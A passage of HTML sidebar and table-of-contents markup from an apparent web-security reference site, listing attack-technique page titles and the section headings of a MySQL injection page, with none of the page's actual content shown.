</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_22_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_22">
<span class="md-nav__icon md-icon"></span>
GraphQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../GraphQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
GraphQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_23" >
<label class="md-nav__link" for="__nav_23" id="__nav_23_label" tabindex="0">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_23_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_23">
<span class="md-nav__icon md-icon"></span>
HTTP Parameter Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../HTTP%20Parameter%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_24" >
<label class="md-nav__link" for="__nav_24" id="__nav_24_label" tabindex="0">
<span class="md-ellipsis">
Headless Browser
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_24_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_24">
<span class="md-nav__icon md-icon"></span>
Headless Browser
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Headless%20Browser/" class="md-nav__link">
<span class="md-ellipsis">
Headless Browser
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_25" >
<label class="md-nav__link" for="__nav_25" id="__nav_25_label" tabindex="0">
<span class="md-ellipsis">
Hidden Parameters
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_25_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_25">
<span class="md-nav__icon md-icon"></span>
Hidden Parameters
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Hidden%20Parameters/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Hidden Parameters
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_26" >
<label class="md-nav__link" for="__nav_26" id="__nav_26_label" tabindex="0">
<span class="md-ellipsis">
Insecure Deserialization
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_26_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_26">
<span class="md-nav__icon md-icon"></span>
Insecure Deserialization
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/DotNET/" class="md-nav__link">
<span class="md-ellipsis">
.NET Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/Java/" class="md-nav__link">
<span class="md-ellipsis">
Java Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/Node/" class="md-nav__link">
<span class="md-ellipsis">
Node Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/PHP/" class="md-nav__link">
<span class="md-ellipsis">
PHP Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/Python/" class="md-nav__link">
<span class="md-ellipsis">
Python Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/Ruby/" class="md-nav__link">
<span class="md-ellipsis">
Ruby Deserialization
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_27" >
<label class="md-nav__link" for="__nav_27" id="__nav_27_label" tabindex="0">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_27_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_27">
<span class="md-nav__icon md-icon"></span>
Insecure Direct Object References
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Insecure%20Direct%20Object%20References/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_28" >
<label class="md-nav__link" for="__nav_28" id="__nav_28_label" tabindex="0">
<span class="md-ellipsis">
Insecure Management Interface
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_28_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_28">
<span class="md-nav__icon md-icon"></span>
Insecure Management Interface
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Insecure%20Management%20Interface/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Management Interface
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_29" >
<label class="md-nav__link" for="__nav_29" id="__nav_29_label" tabindex="0">
<span class="md-ellipsis">
Insecure Randomness
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_29_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_29">
<span class="md-nav__icon md-icon"></span>
Insecure Randomness
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Insecure%20Randomness/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Randomness
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_30" >
<label class="md-nav__link" for="__nav_30" id="__nav_30_label" tabindex="0">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_30_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_30">
<span class="md-nav__icon md-icon"></span>
Insecure Source Code Management
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Insecure%20Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Source%20Code%20Management/Bazaar/" class="md-nav__link">
<span class="md-ellipsis">
Bazaar
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Source%20Code%20Management/Git/" class="md-nav__link">
<span class="md-ellipsis">
Git
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Source%20Code%20Management/Mercurial/" class="md-nav__link">
<span class="md-ellipsis">
Mercurial
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Source%20Code%20Management/Subversion/" class="md-nav__link">
<span class="md-ellipsis">
Subversion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_31" >
<label class="md-nav__link" for="__nav_31" id="__nav_31_label" tabindex="0">
<span class="md-ellipsis">
JSON Web Token
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_31_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_31">
<span class="md-nav__icon md-icon"></span>
JSON Web Token
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../JSON%20Web%20Token/" class="md-nav__link">
<span class="md-ellipsis">
JWT - JSON Web Token
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_32" >
<label class="md-nav__link" for="__nav_32" id="__nav_32_label" tabindex="0">
<span class="md-ellipsis">
Java RMI
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_32_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_32">
<span class="md-nav__icon md-icon"></span>
Java RMI
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Java%20RMI/" class="md-nav__link">
<span class="md-ellipsis">
Java RMI
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_33" >
<label class="md-nav__link" for="__nav_33" id="__nav_33_label" tabindex="0">
<span class="md-ellipsis">
LDAP Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_33_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_33">
<span class="md-nav__icon md-icon"></span>
LDAP Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../LDAP%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LDAP Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_34" >
<label class="md-nav__link" for="__nav_34" id="__nav_34_label" tabindex="0">
<span class="md-ellipsis">
LaTeX Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_34_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_34">
<span class="md-nav__icon md-icon"></span>
LaTeX Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../LaTeX%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LaTeX Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_35" >
<label class="md-nav__link" for="__nav_35" id="__nav_35_label" tabindex="0">
<span class="md-ellipsis">
Mass Assignment
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_35_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_35">
<span class="md-nav__icon md-icon"></span>
Mass Assignment
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Mass%20Assignment/" class="md-nav__link">
<span class="md-ellipsis">
Mass Assignment
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_36" >
<label class="md-nav__link" for="__nav_36" id="__nav_36_label" tabindex="0">
<span class="md-ellipsis">
Methodology and Resources
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_36_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_36">
<span class="md-nav__icon md-icon"></span>
Methodology and Resources
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Active%20Directory%20Attack/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Bind Shell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - AWS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - Azure
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Container%20-%20Docker%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Docker
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Container%20-%20Kubernetes%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Kubernetes
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Escape%20Breakout/" class="md-nav__link">
<span class="md-ellipsis">
Application Escape and Breakout
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/HTML%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
HTML Smuggling
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Hash%20Cracking/" class="md-nav__link">
<span class="md-ellipsis">
Hash Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Initial%20Access/" class="md-nav__link">
<span class="md-ellipsis">
Initial Access
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Linux%20-%20Evasion/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Evasion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Linux%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/MSSQL%20Server%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Server
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Metasploit
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Methodology%20and%20enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Bug Hunting Methodology and Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Network%20Discovery/" class="md-nav__link">
<span class="md-ellipsis">
Network Discovery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Network%20Pivoting%20Techniques/" class="md-nav__link">
<span class="md-ellipsis">
Network Pivoting Techniques
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Office%20-%20Attacks/" class="md-nav__link">
<span class="md-ellipsis">
Office - Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Powershell%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Powershell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Reverse Shell Cheat Sheet
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Management &amp; CI/CD Compromise
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Vulnerability%20Reports/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Reports
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Web%20Attack%20Surface/" class="md-nav__link">
<span class="md-ellipsis">
Subdomains Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
Windows - AMSI Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20DPAPI/" class="md-nav__link">
<span class="md-ellipsis">
Windows - DPAPI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20Defenses/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Defenses
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Download and execute methods
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20Mimikatz/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Mimikatz
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20Using%20credentials/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Using credentials
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_37" >
<label class="md-nav__link" for="__nav_37" id="__nav_37_label" tabindex="0">
<span class="md-ellipsis">
NoSQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_37_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_37">
<span class="md-nav__icon md-icon"></span>
NoSQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../NoSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
NoSQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_38" >
<label class="md-nav__link" for="__nav_38" id="__nav_38_label" tabindex="0">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_38_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_38">
<span class="md-nav__icon md-icon"></span>
OAuth Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../OAuth%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_39" >
<label class="md-nav__link" for="__nav_39" id="__nav_39_label" tabindex="0">
<span class="md-ellipsis">
ORM Leak
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_39_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_39">
<span class="md-nav__icon md-icon"></span>
ORM Leak
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../ORM%20Leak/" class="md-nav__link">
<span class="md-ellipsis">
ORM Leak
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_40" >
<label class="md-nav__link" for="__nav_40" id="__nav_40_label" tabindex="0">
<span class="md-ellipsis">
Open Redirect
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_40_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_40">
<span class="md-nav__icon md-icon"></span>
Open Redirect
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Open%20Redirect/" class="md-nav__link">
<span class="md-ellipsis">
Open URL Redirect
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_41" >
<label class="md-nav__link" for="__nav_41" id="__nav_41_label" tabindex="0">
<span class="md-ellipsis">
Prompt Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_41_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_41">
<span class="md-nav__icon md-icon"></span>
Prompt Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Prompt%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Prompt Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_42" >
<label class="md-nav__link" for="__nav_42" id="__nav_42_label" tabindex="0">
<span class="md-ellipsis">
Prototype Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_42_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_42">
<span class="md-nav__icon md-icon"></span>
Prototype Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Prototype%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
Prototype Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_43" >
<label class="md-nav__link" for="__nav_43" id="__nav_43_label" tabindex="0">
<span class="md-ellipsis">
Race Condition
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_43_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_43">
<span class="md-nav__icon md-icon"></span>
Race Condition
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Race%20Condition/" class="md-nav__link">
<span class="md-ellipsis">
Race Condition
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_44" >
<label class="md-nav__link" for="__nav_44" id="__nav_44_label" tabindex="0">
<span class="md-ellipsis">
Regular Expression
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_44_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_44">
<span class="md-nav__icon md-icon"></span>
Regular Expression
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Regular%20Expression/" class="md-nav__link">
<span class="md-ellipsis">
Regular Expression
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_45" >
<label class="md-nav__link" for="__nav_45" id="__nav_45_label" tabindex="0">
<span class="md-ellipsis">
Request Smuggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_45_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_45">
<span class="md-nav__icon md-icon"></span>
Request Smuggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Request%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
Request Smuggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_46" >
<label class="md-nav__link" for="__nav_46" id="__nav_46_label" tabindex="0">
<span class="md-ellipsis">
SAML Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_46_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_46">
<span class="md-nav__icon md-icon"></span>
SAML Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../SAML%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SAML Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_47" checked>
<label class="md-nav__link" for="__nav_47" id="__nav_47_label" tabindex="0">
<span class="md-ellipsis">
SQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_47_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_47">
<span class="md-nav__icon md-icon"></span>
SQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../" class="md-nav__link">
<span class="md-ellipsis">
SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../BigQuery%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Google BigQuery SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Cassandra%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cassandra Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../DB2%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
DB2 Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../MSSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Injection
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
MySQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<a href="./" class="md-nav__link md-nav__link--active">
<span class="md-ellipsis">
MySQL Injection
</span>
</a>
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-default-databases" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Default Databases
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-comments" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Comments
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-testing-injection" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Testing Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-union-based" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Union Based
</span>
</a>
<nav class="md-nav" aria-label="MYSQL Union Based">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#detect-columns-number" class="md-nav__link">
<span class="md-ellipsis">
Detect Columns Number
</span>
</a>
<nav class="md-nav" aria-label="Detect Columns Number">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#iterative-null-method" class="md-nav__link">
<span class="md-ellipsis">
Iterative NULL Method
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#order-by-method" class="md-nav__link">
<span class="md-ellipsis">
ORDER BY Method
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#limit-into-method" class="md-nav__link">
<span class="md-ellipsis">
LIMIT INTO Method
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#extract-database-with-information_schema" class="md-nav__link">
<span class="md-ellipsis">
Extract Database With Information_Schema
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#extract-columns-name-without-information_schema" class="md-nav__link">
<span class="md-ellipsis">
Extract Columns Name Without Information_Schema
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#extract-data-without-columns-name" class="md-nav__link">
<span class="md-ellipsis">
Extract Data Without Columns Name
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mysql-error-based" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Error Based
</span>
</a>
<nav class="md-nav" aria-label="MYSQL Error Based">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#mysql-error-based-basic" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Error Based - Basic
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-error-based-updatexml-function" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Error Based - UpdateXML Function
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-error-based-extractvalue-function" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Error Based - Extractvalue Function
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-error-based-name_const-function-only-for-constants" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Error Based - NAME_CONST function (only for constants)
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mysql-blind" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Blind
</span>
</a>
<nav class="md-nav" aria-label="MYSQL Blind">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#mysql-blind-with-substring-equivalent" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Blind With Substring Equivalent
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-blind-using-a-conditional-statement" class="md-nav__link">
